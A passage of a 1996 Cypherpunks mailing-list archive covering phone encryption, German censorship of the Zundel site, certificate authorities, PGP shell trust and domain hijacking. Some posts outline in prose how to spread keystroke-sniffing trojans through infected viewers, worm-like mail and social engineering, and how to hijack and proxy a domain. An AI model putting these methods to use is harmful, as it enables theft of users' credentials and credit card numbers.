^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

delighted to discuss them at all, I would bet.  Anyone interested
in a discussion of whether or not keyboard sniffers work?

a pox on your virtual house for a bad spam, poorly aimed at this
list, in particular. 
NEVER TYPE CYPHERPUNKS@TOAD.COM IN THE TO: LINE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 22:40:27 +0800
To: prmoyer@magpage.com (Philip R. Moyer)
Subject: Re: encrypted cellphones
Message-ID: <199601310810.AAA00261@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:18 PM 1/30/96 -0500, prmoyer@magpage.com (Philip R. Moyer) wrote:
>Well, I'm discouraged.  I'm looking for strongly encrypted cellular telephones,
>but I can't seem to find many.  
Are you looking for cellphones, or cordless phones?  There aren't a lot of
strongly encrypted cordless phones out there, but there may be some.
Digital spread spectrum is probably the best that's easy to find;
other kinds of "digital" phones usually pick a not-too-busy frequency
and transmit digitized voice, which is mildly secure against other people
using your base unit to make their phone calls, but doesn't protect your
privacy against anyone with digital-capable equipment.

The middle ground between cordless phones and cellphones includes
cordless phones with ranges of about a mile (AT&T and some other vendors
have sold them); they're typically in the $300-500 range, and use
spread spectrum to avoid interference to/from other phones.
It also includes phone services that can handle portable phones that
you have to stay in one place to use (i.e. once you start your phone call,
if you go out of range your call gets dropped rather than handed off 
to another cell.)  I'm not aware of commercial service like this in the US,
but there are wireless PBXs that work this way (which can be cheaper than
stringing phone wires around buildings.)

Cellphones, of course, can only (usefully) use encryption if the
cellular service provider uses it (i.e. if the end that's listening
to your radio transmission can decode it :-)  American cell-phone 
providers don't.  The GSM phones used in much of the world have encryption,
but it's apparently not very strong.

>I would really like to avoid using a GAK enabled product,
>if there's any way to avoid it (even if it means paying lots of extra $$$).

I'm not aware of any GAKed cordless phones, though I supposed there could be
such.
US cellular phones don't need GAK because the government's strong-armed the
standards committees into using appallingly trivial crypto - none of this
strong 40-bit RC for you :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 16:48:04 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Germany, or "Oh no not again"
Message-ID: <199601310810.AAA00286@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A message claiming to be from
>                          SANDY SANDFORT
allegedly wrote:
>> Isn't there something in U.S. Code about crossing state lines
>> for immoral purposes?
>No relevance here.  Originally enacted to combat the "white 
>slavery" trade, it was probably used more to prosecute unmarried
>lovers for sexual activity outside of marriage.  I don't even
>know if it's still on the books, but as I said, no relevance in
>the current debate.

There's a lot of US law about transporting various materials
across state lines or using interstate carrier services or
in ways that _might_ affect interstate commerce.  
Politically incorrect language or imagery (obscenity for adults;
indecency for children), politically incorrect vegetable products,
politically correct but economically incorrect vegetable and animal
products, geographically incorrect humans, mathematically correct
but politically incorrect image-manipulation bitstreams all are affected.

While the German censorship is evil, immoral, and impractical,
I have to agree with Dr. Vulis that many American laws are similarly
wrong, and the Germans are at least trying, in their inadequate and
immoral way, to fight genuine evils that are far worse than the stuff
the US government is attempting to censor.

BTW, today's "Recorder" (Bay Area legal newspaper) reports that the
US 6th Circuit Court of Appeals upheld the Thomases' conviction.
96 C.D.O.S 609.

ABTW, they didn't need those laws to fight "white slavery"; kidnapping
and rape were already illegal, but any opportunity to make a law....


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 16:49:03 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Netscape, CAs, and Verisign]
Message-ID: <199601310810.AAA00299@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:55 PM 1/29/96 -0500, Peter Williams wrote, in response to Alex:
>>I'd like to see a less centralized CA that's tied into the existing system
>>of notaries.  The idea is to make it necessary to spoof a notary in order
>>to spoof the CA.  That won't make spoofing the CA impossible (nothing
>>will), but it will make spoofing the CA illegal. 
...
>I dont understand how you intend to make CA spoofing illegal. Who
>who perform the enforcement? (By illegal, I assume you mean that
>there is a criminal offence involved, rather than a tort.)

Is providing false documents to a notary criminal fraud, or only civil?

>>Fees for the whole procedure ought to be less than $30.  The CA ought to
>>operate off of the fees from the agents as a non-profit organization, and
>>the agents ought to keep the fees paid by the people requesting the
>>certificates.

>Notary fees might be best controlled by the notary, not the CA. 
>Seems an unreasonable restriction of trade to price-fix, even at the low-end.

Notary fees can be agreed contractually between the notary and the CA;
if they want to do a list price / street price system, or a non-profit,
or a dog-eat-capitalist-running-dog competitive system, the market can
let you pick your favorites.

>There is indeed a large body of legal ramifications in this
>area. The best way to learn about it is to become a CA and do it. Risk
>taking is part of being in the CA business, however you operate it,
>even for free.

>>Morevover, although I don't think it's reasonable to expect Netscape to
>>agree to include a non-existent CA in their browsers sight unseen, at the
>>same time it doesn't seem smart to sink money into setting up the CA
>>without some indication from Netscape that they're willing to give the
>>idea good faith consideration. 
>Navigator betas seem to already facilitate users configuring their own
>trust points in a manner rather similar to adding a key to your
>personal PGP keyring.

Letting the user decide whom to trust certainly seems like the best
approach, and makes it possible to build a Web of Trust on top of Netscape
rather than being stuck with hierarchical certifications.
Meanwhile, if Netscape wants to sell the top two slots in their
CA list to the highest-bidding advertiser like they do with searchers,
they still can.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 16:51:26 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: [flippant reply] Re: [rant] A thought on filters and the V-Chip
Message-ID: <199601310810.AAA00305@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 1/29/96 -0500, you wrote:
>The cypherpunks relevance of all this is that it should soon be possible to
>create completely mediated environments for ourselves and our children.
>Through the use of implants and real-time VR processing, it will be possible
>to edit our "interface" with the Real World such that unpleasant aspects are
>edited out.  We will be able to change the attire, hair, facial expressions,
>voice, and even smell of those around us to conform to our own esthetic
>desires.  Likewise with our physical surroundings.  Safety may discourage
>making a complete transformation in one's surroundings, but one can
>certainly soften the edges.

Meanwhile, rose-colored glasses are available, or
scratched-up hard contact lenses if that's the reality you'd prefer ....

                        Bill, who spends an hour or two wearing headphones
                        on the train several days a week....


                                
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 16:49:57 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: CONTEST: Name That Program!
Message-ID: <199601310810.AAA00335@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 AM 1/30/96 -0500, Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
> In fact, I'd settle for getting onto 10% of the machines, although I
> suspect I could get onto more like 80% without raising a sweat.

You've alleged that Macs and Unixen should be about as easy as Windows
machines to crack with your CardShark.  I disagree - most Mac users I
know have been using virus protectors more consistently and reliably
than DOS/Windows users.  However, if their virus software only stops
known viruses, rather than anything modifying critical resources,
you might get away with it for long enough to surf some numbers.

Unix is a much tougher case - while there have been a couple of viruses,
they don't spread very well, even when everyone uses the same binary
formats.  B2 helps, of course; B1 configured reasonably should also work.

...
>Case closed.  Your argument would hold a lot more weight if you could
>convince me that the average Internet consumer was going to rebuild his
>UNIX kernel every few weeks. 

I suspect a machine that gets rebuilt every week may be _more_ at risk :-)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 22:36:35 +0800
To: nameit@fv.com
Subject: Re: CONTEST: Name That Program! -- ESCROW
Message-ID: <199601310811.AAA00397@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ESCROW - Easily Stolen Creditcard Recorder Or Whatever
        Easily Stolen Creditcard Recording {Obnoxious, Obsequious, Obscure,
Obfuscator } Widget

(one objective is to find a way to insult the "Key Escrow" people, of course.
And besides, this _is_ escrow - you're giving your credit card number
to your trusted computer to hold on to and deliver to someone else.)

BCCI - Basic Credit Card Interceptor
CIA - Card Intercepting Agent
NSA - Nathaniel's Security Attack, Network Stealing {Agent, Accessory}, Not
Secure Anough

Bill Stewart, 2555 W. Middlefield Rd #882, Mountain View CA 94043
T-Shirt Size: XXL
Cash Size: Small Unmarked Bills or anonymous digital cash?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 31 Jan 1996 20:17:10 +0800
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: [NOISE] Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <9601302336.AA14776@alpha>
Message-ID: <Pine.BSF.3.91.960131001434.3143K-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Mike McNally wrote:

> 
> Brian Davis writes:
>  > > > m5@dev.tivoli.com (Mike McNally) writes:
>  > > > 
>  > > > ... for immoral purposes?
>  > > 
>  > > ... white wimmin ...
>  > 
>  > On the contrary ...
> 
> Not that I don't wish I could take credit for a discussion thread of
> such high caliber as this, but I can't; I have no idea how my name got
> glued on there.

I suspect that you had a comment on the thread before it went so far 
astray and that I screwed up the attributions ... Sorry.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 17:08:20 +0800
To: cypherpunks@toad.com
Subject: Handy WWW anonymizer proxy *and* translator!
Message-ID: <Pine.ULT.3.91.960131003957.27647H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Not only does it prevent the nasties from logging where you're coming 
from, but it also translates to Canadian on the fly, eh?

-rich

---------- Forwarded message ----------
Date: Wed, 31 Jan 1996 00:32:36 -0500
From: John R. Covert <covert@covert.enet.dec.com>
Newgroups: alt.revisionism, alt.politics.white-power,
    alt.internet.media-coverage, alt.censorship, comp.org.eff.talk,
    soc.culture.german
Subject: Re: Simon Wiesenthal Center Did Not Attempt to Censor Internet

In article <declanmDLzvJ8.8MK@netcom.com>, declanm@netcom.com (D B McCullagh) wrote:

>If the German government forces Deutsche Telekom to block access to web
>servers at Carnegie Mellon University, MIT, and Stanford University, it
>will be slicing off communications with three of the most respected
>universities in the United States. 

It will be interesting to see if they do.  At first, I refused to believe
that they would do it to WebCom.

I just thought I'd mention another technique for dealing with this problem.
It doesn't require dedicating disk space to specific sites; instead, it
relays through to any site you specify.

For an example, see "The Great Web Canadianizer" at
http://www.io.org/~themaxx/canada/can.html

To thwart censorship of specific sites, people who have a bit of bandwidth
to spare could set up cgi scripts like this one (without the text modification
the Canadianizer does -- that's its hack).  (Zundel's stuff is no less
offensive after the Canadianizer adds a bunch of "eh?"s and "hosers" and
changes all the "-ing"s to "-in'".)

/john




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jan 1996 17:13:00 +0800
To: "Michael E. Carboy" <carboy@hooked.net>
Subject: Re: PGP Shell Integrity
Message-ID: <199601310852.AAA04391@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 1/29/96 -0800, you wrote:

>Firstly, if this is viewed as "Noise" rather than "Signal", please accept
my apologies.
Looks like a real technical discussion instead of a flame - obviously the
wrong list :-)

>The matter at hand concerns my concern over my inability to check the
> "integrity" of a PGP windoze shell written by Michael R. Lyman at Aegis
Research Corp.
>
>I worry that since the shell has access to my secret ring that it might
> be sending it somewhere without my knowledge.  
I don't know that package, but most of them act as wrappers around
DOS PGP rather than filtering keystrokes or doing PGP internals.

There are several risks - getting your secret ring, getting your passphrase,
getting the RSA parameters without the passphrase itself.
Obviously, having your secret key ring file leak is not good,
but the fun parts _are_ IDEA-encrypted using your passphrases,
so it's not too much of a risk.  Having the passphrase or the
raw keys stolen would obviously be worse.

DOS/Windows is _not_ a secure operating system, if you believe
that there's more than one person in the universe.  (DOS doesn't
believe that, so in some sense it's perfectly secure. :-)
Nathaniel Borenstein's recent postings are a good reminder that
keystrokes can be stolen, easily, in that environment.

>The freeware was, according
> to Mr.Lyman, developed "Project Manager, Forward Air Missile Defense,
> United States Army Missile Command".  That gvt. affiliation gives me
> considerable pause as regards back doors and other ways my secret ring
> and pass phrase could be compromised.
>
>Does anyone have any familiarity with this freeware?  I do not think
> I am being paranoid.. just careful.  Lastly, if I am not a programmer,
> what sort of inspection can I perform on the software to make sure it is
not "bugged"?

Without source code, if you're not a programmer, the things to look for are
circumstantial evidence - is the copy of the program you got off the server
PGP-signed by the purported author?  Or by any programmers you trust?
That doesn't tell you the program is trustable, but it does tell you if
it's a fake replacing the real thing.  Is the real thing trustable?
(Well, probably...)

There's also the problem of leaking your key back to the Bad Guys,
but that's easy - the program could leak it out in your PGP messages
(either obviously, as a second recipient, or in subtle nasty ways
like playing with the system clock on timestamps.)


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 31 Jan 1996 16:51:31 +0800
To: watson@tds.com
Subject: Re: your bogus post
Message-ID: <v02140a00ad34aea612d3@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 1/30/96, watson@tds.com wrote:

>On Tue, 30 Jan 1996, Paul Graham wrote:
>
>>...
>> A company capable of doing such irresponsible things is not one
>> that we would trust with users' money.
>> ...
>
>Some of you must have missed the superbowl ads where people and frogs
>were getting frozen to beverage cans, and movie actors moved the grand
>canyon with a horse.

I think that there is a MAJOR difference between the two types of
Marketing. The Superbowl adds are not designed with the intent to imply
that what is being shown is Reality (how many viewers would think that what
was being shown was a REAL [as opposed to symbolic] effect of the product?)
while the FV is intended to play on the technical ignorance of the
reader/audience and give a false [or at least slanted] view of reality.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 31 Jan 1996 17:12:36 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
In-Reply-To: <Pine.ULT.3.91.960130233201.27647G-100000@Networking.Stanford.EDU>
Message-ID: <4l3mdcy00YUsJK2k59@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 30-Jan-96 Re: [NOISY] Your own
Zundel.. by Rich Graves@networking.s 
> They are calling major newspapers in several countries, and Time=20
> Magazine, proclaiming their "censorship-free zone" strategy.
>  
> They are more organized and media-savvy than I am. They are professional=20
> liars; "we" are not.

This is an enormously important point to make. Rich put the files online
via AFS, which is where I got them, supplemented by some taken directly
from the Z-site. We did *not* do it at the request of the Zundelfolken.

I've updated the censorship.html file at my mirror to reflect the
nuances of the situation.

BTW, Sameer has mirrored, and someone in Japan likely will too.

http://www.c2.org/uncensored/Not_By_Us_Not_Our_Views/Not_By_Me_Not_My_Views/

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 31 Jan 1996 17:10:45 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
In-Reply-To: <v02120d02ad34bb4854c5@[192.0.2.1]>
Message-ID: <0l3mmE200YUsNK2kt7@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 30-Jan-96 Re: [NOISY] Your own
Zundel.. by Lucky Green@netcom.com 
> I am really interested what the German government is going to do next.
> Force their universities to dismount AFS?
>  
> How can we best get the fact the their censorship efforts have hit *the
> wall* to their attention? Any Germans on this list that can file a
> complaint against the sites with the German authorities? What about
> contacting German Telekom?
>  
> We won't have won until they restore the routes to Webcom.

I agree -- I don't think the censors have lost. If anything, the
restrictions are getting worse; the latest reports from Germany say that
the www.webcom.com blocking is not limited to DT/T-Online.

Now the German universities are blocking, as is the "Win" scientific
network. All in the absence of a court order. One message forwarded to
me apparently came from network admins:

ich moechte Sie an dieser Stelle ueber eine bewusste
Routing-Einschraenkung informieren.  Bis auf weiteres wird die Route
zum Server www.webcom.com alias s1000e.webcom.com (206.2.192.66) auf
dem ipgate2 geerdet: "wir haben nun das Routing zum WWW-Server
www.webcom.com eingestellt.  Wie aus der Tagespresse zu erfahren war,
wird ueber diesen Server Nazi-Propaganda verteilt. Die
Staatsanwaltschaft Mannheim ermittelt gegen Ernst Zuendel, Produzent
dieser WWW-Seite, wegen des Verdachts auf Volksverhetzung."

If anyone's interested, we're talking about this in more detail on
fight-censorship, which is probably a more appropriate forum. Email
fight-censorship-request+@andrew.cmu.edu if you'd like to be added.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Wed, 31 Jan 1996 21:04:18 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: AOL privacy (not)
Message-ID: <V3ikiD8w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


AOL RECORDS USED TO SOLVE MURDER CASE
Fairfax County, Va. police recently obtained a search warrant for electronic
files relating to participants in an American Online chat room in an effort
to solve a murder in New Jersey.  The victim had met his alleged assailant
through a "men for men" chat room, and investigators say several other chat
room participants helped in disposing of the body.  One of them, a
24-year-old woman, is now charged with tampering with the evidence.  An AOL
spokeswoman said that it is the company's policy to comply with subpoenas,
and that although it does not keep records from chat rooms, it does keep
records of e-mail for five days before they are purged.  "We certainly
respect and abide by our customers' right to privacy, but we are also going
to follow the law.  We have 4.5 million customers -- that's the size of a
city.  When we have some problems, we have to deal with it responsibly."
(St. Petersburg Times 28 Jan 96)

***************************************************************
EDUPAGE is what you've just finished reading.  (Please note that it's
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage Emmitt Smith (assuming that your name is Emmitt Smith;  if it's not,
substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Wed, 31 Jan 1996 21:29:51 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Handy WWW anonymizer proxy *and* translator!
In-Reply-To: <Pine.ULT.3.91.960131003957.27647H-100000@Networking.Stanford.EDU>
Message-ID: <199601311306.IAA26970@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Not only does it prevent the nasties from logging where you're coming 
> from, but it also translates to Canadian on the fly, eh?

I thought it was hilarious, but my spouse (who is Canadian) found it less 
humorous.  I still got a little mileage out of using the words "hoser" 
and "hosehead" for a few days ;)

> For an example, see "The Great Web Canadianizer" at
> http://www.io.org/~themaxx/canada/can.html

> To thwart censorship of specific sites, people who have a bit of bandwidth
> to spare could set up cgi scripts like this one (without the text modification
> the Canadianizer does -- that's its hack).  (Zundel's stuff is no less
> offensive after the Canadianizer adds a bunch of "eh?"s and "hosers" and
> changes all the "-ing"s to "-in'".)

I wrote the author some time back in hopes of getting the source, but no 
luck :(  Anyone have source for this or similar?  I'd be happy to put it 
up on my web site (http://dal1820.computek.net).
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Wed, 31 Jan 1996 21:32:53 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: CONTEST: Name That Program!
In-Reply-To: <199601310810.AAA00335@ix10.ix.netcom.com>
Message-ID: <199601311313.IAA27518@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Unix is a much tougher case - while there have been a couple of viruses,
> they don't spread very well, even when everyone uses the same binary
> formats.  B2 helps, of course; B1 configured reasonably should also work.

Most people are very nervous about running binaries on a unix box that
they get off the net, and nobody runs a setuid-to-root binary on their
system unless they paid $$$ for it and got it from a reputable vendor.  I
personally only run one binary on my machine that I didn't compile myself
- that's Netscape. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Wed, 31 Jan 1996 21:31:05 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: x-app/pgp-encrypted
Message-ID: <01BAEFB3.1A5D0C40@loki>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a web server that uses PGP instead of SSL or STT or 
whatever is the new acronym of the week for secure web transactions?

A server would have its public key available for anyone get.  All 
transactions that need encrypting would be encrypted to the server by using 
the public key.  PGP 3.0's API would make this even easier (or so I've 
heard).

The reverse could also be implemented.  By using some identifying 
characteristic of the user (maybe a user defined name) and the 
corresponding PGP key, data could be transmitted securely to the user.


----------
Brian Gorka
Key fingerprint =  ED 7D 78 7E 95 E8 05 01  27 01 A1 74 FA 4B 86 53 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Eden <erice@internic.net>
Date: Wed, 31 Jan 1996 22:00:30 +0800
To: rishab@dxm.org (Rishab Aiyer Ghosh)
Subject: Re: Domain hijacking, InterNIC loopholes
In-Reply-To: <9601301819.AA00964@toad.com>
Message-ID: <199601311339.IAA20864@ops.internic.net>
MIME-Version: 1.0
Content-Type: text/plain


> This is not a security risk? No. But, to quote a delightfully
> low-key document from InterNIC, "[such] an unauthorized update 
> could lead a commercial organization to lose its presence on 
> the Internet until that update is reversed."
> 
> Ah. But that update will be reversed only when victim.com's sysadmins
> realise what's happened. If evil.org is clever enough, it will
> not halt the mail flow, but forward everything on to victim.com
> (after keeping a copy, of course). It could act as a proxy server
> to www.victim.com, accessing all URLs (using victim.com's real
> IP address) on demand and relaying them to browsers who are actually 
> looking at www.evil.org. And so on. Unless victim.com's admins
> are particularly observant, they may not notice a thing.
> 
> That delightful InterNIC document I mentioned is the draft paper
> on the InterNIC Guardian Object, first out in November 1995, latest
> version out earlier this month. It's an internal InterNIC proposal
> for a "Guardian Object" which would guard any other object (such
> as a domain name, or individual, or hostname, or even another
> guardian). It would allow a range of authentication methods, from
> none (very clever) and MAIL-FROM (easy to spoof) to CRYPT (1-way
> hash, like Unix passwd) and PGP (using public keys stored at
> InterNIC). All domain and other templates will be changed to
> work with guardians. The procedures in the original draft looked
> easy enough; the latest ones are formidable.
> 
> Incidentally, this draft appeared two months after the InterNIC
> started charging. The wonders of the profit motive.
> 
> 
The InterNIC Guardian Object Draft has been made publicly available
to the Internet community for comments.  As mentioned, the URL is:
ftp://rs.internic.net/policy/internic/internic-gen-1.txt

We welcome any comments or suggestions you might have about this
draft. The InterNIC has made siginificant improvements to the draft
over the past several months based on public comments.


Eric Eden
erice@internic.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Roberts <djr@saa-cons.co.uk>
Date: Wed, 31 Jan 1996 21:05:05 +0800
To: cypherpunks@toad.com
Subject: PGP commercial usage
Message-ID: <Pine.A32.3.91.960131123812.31052A-100000@haddock.saa-cons.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I have read and reread the documentation that is included with the PGP 
distribution (although my copy is over a year old now), and am still 
trying to work out if commercial use of 2.6ui is allowed outside the USA.

Could someone elaborate for me, or perhaps point me to some up to date 
reference documentation.

TIA - Dave.

Dave Roberts        | "Surfing the Internet" is a sad term for sad people.
Unix Systems Admin  | Get a board, find a beach, surf some REAL waves and
SAA Consultants Ltd | get a *real* life.
Plymouth, U.K.      | -=[For PGP Key, send mail with subject of "get pgp"]=-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <paul@mycroft.actrix.gen.nz>
Date: Wed, 31 Jan 1996 12:22:49 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <8l3TrJ2Mc50eAWY4IF@nsb.fv.com>
Message-ID: <199601310100.OAA00804@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein said:
> 
> > I don't believe you.  Name six.
> 
> Sure thing, always glad to clarify my claims.
> 
> 1. (my current favorite) post it to MSN.  There, Microsoft has made
> getting infected with a Trojan Horse as easy as clicking on an icon
> embedded in a mail or news message.  (You want to try convincing the
> average consumer that it isn't safe, if Microsoft makes it that easy?)
>
> 2.  Get the sources to a public domain image viewer.  Change them
> slightly.  Claim that you've improved it by 13.7%.  Post your improved
> (and infected) image viewer to the net.

Trojan horse.  This is the same as #1. 

> 3.  Ditto for an audio viewer, a mail reader, a news reader,.... 
> (zillions right there alone)

Zillions of trojan horses...all the same.
I guess you can call the source credit.asm, sniffer.c, capture.bas or
any number of other names, too...geez, there's another few zillion.
 
> 4.  Imitate the IBM Christmas exec.  Break into someone's site and steal
> their mail aliases file.  Now send mail to everyone on their alias list,
> pretending to be them, offering them a cute animation program they can
> install.  The animation will happen, but it will also send mail to all
> THEIR aliases (like the Christmas exec) and (unlike that) install our
> malicious snooping software.

Another trojan horse.

> 5.  Write a genuinely useful program (or a game) of your own, but embed
> your attack in it.  (Caution:  Being the real author will increase your
> traceability.)

Another trojan horse.

> 6.  Write a pornographic screen saver.  Not only will zillions of people
> download it, but they will EXPECT the code to watch keystrokes.

Another trojan horse.

> 7.  [*maybe*] Spread it by Java applet.  This is a maybe because the
> level of Java security seems to be browser-discretionary.  Even a
> relatively conservative let-the-user-choose approach like Netscape's,
> however, can be defeated with a little social engineering, as in "this
> is a really cool Java applet to do XYZ, but you'll have to set
> Netscape's Java security level to minimum to run it....."

"...and type your CC# into a box that advertises itself as an 'insecure
foreign applet'" or some such thing.
Far as I can tell you can't hook the keyboard this way, just ask people to
give you the number.  And then you can only send it back to wherever the
applet came from.

> 8.  Internet-based breakin/installations, e.g. to NT or anything else
> that runs incoming services.
>
> 9.  Traditional virus techniques.
> 
> Oh, you only asked for 6, sorry.....  Feel free to ignore a few.

I count 4.

--
Paul Foley            Email: <mycroft@actrix.gen.nz>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 31 Jan 1996 13:56:46 +0800
To: packrat@tartarus.uwa.edu.au
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!) [NOISE]
In-Reply-To: <199601301216.UAA00325@ratbox.rattus.uwa.edu.au>
Message-ID: <199601310534.QAA12672@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello dmacfarlane@zip.sbi.com (David Macfarlane), cypherpunks@toad.com
  and packrat@tartarus.uwa.edu.au
        (ie Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>)
 
BM wrote:
> In message <9601292041.AA14422@zip_master2.sbi.com>, 
>   David Macfarlane wrote:
...
> If secure input is needed then it shouldn't be too much of a
> problem. I doubt the program would recognize either of INTERCAL input
> or output (as a random example)
...

Original INTERCAL had numbers spelled out in English as input, and
output in butchered roman numerals. I guess you can get people
to do the input (four or eight digits at a time only), but I don't think
the roman numerals are going to cut it, somehow...  and anyway it's
not that much more secure.

C-INTERCAL is less anglo-centric, allowing numbers to be input in
eight languages (eight = ashtan = zortzi = walo = chicue = rva =
